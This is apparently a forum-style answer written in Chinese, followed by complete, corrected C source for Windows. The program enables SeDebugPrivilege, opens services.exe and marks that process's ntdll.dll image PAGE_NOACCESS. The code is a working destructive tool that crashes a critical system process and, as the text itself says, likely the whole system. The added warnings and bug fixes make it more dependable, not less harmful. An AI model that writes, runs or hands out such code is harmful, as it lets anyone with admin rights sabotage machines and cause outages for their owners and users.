原理很简单：以 PROCESS_VM_OPERATION 权限打开目标进程（NtProtectVirtualMemory 只需要这一项访问权，没必要 PROCESS_ALL_ACCESS），再把目标进程里 ntdll.dll 的整个映像改成 PAGE_NOACCESS。几点注意：下面的代码先用 RtlAdjustPrivilege(20) 启用 SeDebugPrivilege（需要管理员权限）才能打开 services.exe；它用的是本进程 ntdll 的基址，所以编译出的程序位数必须与目标进程一致（32 位程序在 WoW64 下看到的不是 64 位 services.exe 里的那份 ntdll）；services.exe 是关键系统进程，ntdll 不可访问后它会崩溃，整个系统很可能随之蓝屏，只应在可抛弃的测试机上运行。
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
#pragma comment(lib,"Psapi.lib")
/* RtlAdjustPrivilege (exported by ntdll, undocumented): enables or disables a
 * privilege identified by its LUID value. `Enabled` receives the previous
 * state. Judging by the parameter name, CurrentThread == FALSE presumably
 * targets the process token rather than the thread's impersonation token.
 * Resolved at runtime with GetProcAddress in main(); main() passes 20, the
 * LUID value of SeDebugPrivilege. */
typedef NTSTATUS (__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
/* NtProtectVirtualMemory (exported by ntdll): native counterpart of
 * VirtualProtectEx. BaseAddress and RegionSize are annotated __inout, i.e.
 * the callee may write adjusted values back, so callers must pass writable
 * locals of exactly these types (PVOID and SIZE_T, not a DWORD field).
 * PROCESS_VM_OPERATION on ProcessHandle is sufficient for this call. */
typedef NTSTATUS (__stdcall *NtProtectVirtualMemory_)(
__in HANDLE ProcessHandle,
__inout PVOID *BaseAddress,
__inout PSIZE_T RegionSize,
__in ULONG NewProtectWin32,
__out PULONG OldProtect
);
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
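/*
 * GetPID - return the process id of the first running process whose image
 * name equals `proc` (case-insensitive, e.g. L"services.exe").
 *
 * Returns 0 when no such process exists, when `proc` is NULL, or when the
 * Toolhelp snapshot could not be taken. Callers must treat 0 as "not found"
 * and never hand it to OpenProcess (0 is the System Idle Process).
 *
 * Fixes relative to the original:
 *  - CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, which
 *    is non-NULL; the old `if (hSnapshot)` test missed that and the function
 *    then called CloseHandle on the invalid value.
 *  - The wide (W) Toolhelp entry points are used explicitly so that the
 *    _wcsicmp() against szExeFile compiles whether or not UNICODE is defined.
 */
ULONG GetPID (const WCHAR *proc)
{
    ULONG targetPid = 0;
    PROCESSENTRY32W entry = {0};
    HANDLE hSnapshot;

    if (proc == NULL)
    {
        return 0;
    }

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    entry.dwSize = sizeof(entry);
    for (BOOL ok = Process32FirstW(hSnapshot, &entry); ok; ok = Process32NextW(hSnapshot, &entry))
    {
        if (_wcsicmp(entry.szExeFile, proc) == 0)
        {
            targetPid = entry.th32ProcessID;
            break;
        }
    }

    /* Only a handle we actually obtained is closed. */
    CloseHandle(hSnapshot);
    return targetPid;
}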
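/*
 * Entry point: marks the whole ntdll.dll image inside services.exe as
 * PAGE_NOACCESS.
 *
 * Steps:
 *   1. Read the base and size of ntdll.dll in *this* process. The same base
 *      is assumed for the target, which only holds when both processes have
 *      the same bitness (a 32-bit build under WoW64 sees the 32-bit ntdll,
 *      not the one mapped into a 64-bit services.exe).
 *   2. Enable SeDebugPrivilege (LUID value 20) through RtlAdjustPrivilege so
 *      a protected system process can be opened. This needs an elevated
 *      token; the original ignored the returned NTSTATUS.
 *   3. Open services.exe with only PROCESS_VM_OPERATION, the single access
 *      right NtProtectVirtualMemory requires.
 *   4. Change the protection of the ntdll range to PAGE_NOACCESS.
 *
 * WARNING: services.exe is a critical system process. Once it can no longer
 * execute code in ntdll it will crash and the OS is expected to go down with
 * it. Run this only on a disposable test machine. Opening a handle to
 * services.exe with PROCESS_VM_OPERATION from a non-system process is also a
 * pattern defenders can reasonably audit.
 *
 * Fixes relative to the original: the NTSTATUS results of RtlAdjustPrivilege
 * and NtProtectVirtualMemory are checked; a PID of 0 ("not found") is no
 * longer passed to OpenProcess; the process handle is closed; and the
 * in/out arguments are real PVOID/SIZE_T locals instead of
 * &ModuleInfo.SizeOfImage, a DWORD, which is a type mismatch on 64-bit
 * builds where SIZE_T is 8 bytes.
 *
 * Returns 0 on success and 1 on any failure (a diagnostic goes to stderr).
 */
int main(void)
{
    static const ULONG kSeDebugPrivilege = 20;   /* SE_DEBUG_PRIVILEGE */
    int rc = 1;
    HANDLE hProc = NULL;
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    MODULEINFO ModuleInfo = {0};
    BOOLEAN wasEnabled = FALSE;
    NTSTATUS status;
    ULONG pid;
    /* NtProtectVirtualMemory may write BaseAddress/RegionSize back, so use
     * writable locals of exactly the parameter types. */
    PVOID base;
    SIZE_T size;
    ULONG oldProtect = 0;

    if (ntdll == NULL ||
        !GetModuleInformation(GetCurrentProcess(), ntdll, &ModuleInfo, sizeof(ModuleInfo)))
    {
        fprintf(stderr, "GetModuleInformation(ntdll.dll) failed: %lu\n", GetLastError());
        return rc;
    }
    base = ModuleInfo.lpBaseOfDll;
    size = ModuleInfo.SizeOfImage;

    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (RtlAdjustPrivilege == NULL || NtProtectVirtualMemory == NULL)
    {
        fprintf(stderr, "GetProcAddress on ntdll failed: %lu\n", GetLastError());
        return rc;
    }

    /* A negative NTSTATUS is an error (same test as !NT_SUCCESS). */
    status = RtlAdjustPrivilege(kSeDebugPrivilege, TRUE, FALSE, &wasEnabled);
    if (status < 0)
    {
        fprintf(stderr, "RtlAdjustPrivilege(SeDebugPrivilege) failed: 0x%08lX (not elevated?)\n",
                (unsigned long)status);
        return rc;
    }

    pid = GetPID(L"services.exe");
    if (pid == 0)
    {
        fprintf(stderr, "services.exe not found\n");
        return rc;
    }

    hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, pid);
    if (hProc == NULL)
    {
        fprintf(stderr, "OpenProcess(%lu) failed: %lu\n", pid, GetLastError());
        return rc;
    }

    status = NtProtectVirtualMemory(hProc, &base, &size, PAGE_NOACCESS, &oldProtect);
    if (status < 0)
    {
        fprintf(stderr, "NtProtectVirtualMemory failed: 0x%08lX\n", (unsigned long)status);
    }
    else
    {
        rc = 0;
    }

    CloseHandle(hProc);
    return rc;
}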